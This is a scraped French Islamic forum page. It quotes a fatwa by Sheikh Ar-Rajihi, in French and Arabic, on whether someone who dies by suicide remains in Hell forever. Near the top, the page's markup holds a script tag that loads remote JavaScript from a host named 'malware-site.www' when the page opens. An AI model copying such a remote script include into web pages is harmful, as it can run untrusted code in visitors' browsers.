ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Juillet 2017

LunMarMerJeuVenSamDim
     12
3456789
10111213141516
17181920212223
24252627282930
31      

Calendrier Calendrier

anipassion.com

    Sheikh Abdoul Azziz Ar-Rajihi Est-ce que celui qui se donne lui-même la mort restera éternellement en Enfer ?

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Sheikh Abdoul Azziz Ar-Rajihi Est-ce que celui qui se donne lui-même la mort restera éternellement en Enfer ?

    Message par assalafia le Lun 30 Déc - 10:24

    Surprised 


    Est-ce que celui qui se donne lui-même la mort restera éternellement en Enfer ?

    Sheikh Abdoul Azziz Ar-Rajihi

    Question : Est-ce que celui qui se donne lui-même la mort restera éternellement en Enfer ?

    Réponse : Celui qui se suicide a certes commit un grand péché et toute personne qui commet un grand péché est susceptible d'aller en Enfer par contre il n'y restera pas éternellement, ceci est la croyance des gens de la Sounnah et du consensus au sujet de cette question.
    Sauf celui qui a rendu licite le suicide ou le meurtre d'autrui dans ce cas là il devient apostat.
    Quant à celui qui se suicide par obéissance aux passions et au diable ou qui perd patience ou qui tue autrui par obéissance aux passion ou au diable qu'il sache que se suicider est interdit et tuer autrui est interdit. Il est dans ce cas pêcheur qui a commit un grand péché.

    Quant à ce qui a été rapporté dans le verset :
    {Quiconque tue intentionnellement un croyant, Sa rétribution alors sera l’Enfer, pour y demeurer éternellement. Allah l’a frappé de Sa colère, l’a maudit et lui a préparé un énorme châtiment.}
    (Les femmes : 93)
    Ceci est la croyance des gens de la Sounnah et du consensus le sens de l'éternité "khouloud" ici a un terme c'est à dire qu'il a une fin.
    Mais l'éternité qui concerne les mécréants quant à elle n'a aucune fin, elle veut dire à jamais.

    Il a été rapporté d'après Ibn Abbas qu'Allah l'agrée que celui qui se suicide n'a aucun repentir et cela ne signifie pas qu'il restera éternellement en Enfer mais qu'il ne sera pas pardonné dans le sens qu'il passera obligatoirement par l'Enfer puis il en sortira pour rentrer au Paradis.
    Il a été rapporté également d'après Ibn Abbas qu'Allah l'agrée que celui qui se tue peut se repentir.


    Source : www.shrajhi.com/Fatawa/ID/944

    هل يخلد في النار من قتل نفسه؟


    من قتل نفسه فقد ارتكب كبيرة وأهل الكبائر متوعدون بالنار لكن لا يخلدون في النار وهذا معتقد أهل السنه والجماعه في هذه المسأله إلا إذا استحل قتل نفسه أواستحل قتل غيره فهذا يكون مرتدا أما إذا كان قتل نفسه طاعة للهوى والشيطان أوجزع وعدم صبر أو قتل غيره طاعة للهوى والشيطان ويعلم أن قتل نفسه حرام ويعلم أن قتل غيره حرام فهذا عاصي مرتكب للكبيرة.

    أما ما جاء في الآية الكريمة ( وَمَن يَقْتُلْ مُؤْمِنًا مُّتَعَمِّدًا فَجَزَآؤُهُ جَهَنَّمُ خَالِدًا فِيهَا وَغَضِبَ اللّهُ عَلَيْهِ وَلَعَنَهُ وَأَعَدَّ لَهُ عَذَابًا عَظِيمًا {93} [النساء: 93] فهذا عند أهل السنة خلود مؤمد له أمد وله نهايه بخلاف خلود الكفرة فهو خلود مؤبد لا نهاية له .

    وقد جاء عن ابن عباس أن القاتل لا توبة له ولكن ليس معنى قوله: إنه لا توبة له أنه يخلد في النار بل معنى ذلك أنه لا يعفى عنه بل لا بد أن يعذب في النار ثم يخرج من النار ويدخل الجنه. وجاء أيضا عن ابن عباس أن القاتل له توبه0

      La date/heure actuelle est Dim 23 Juil - 3:44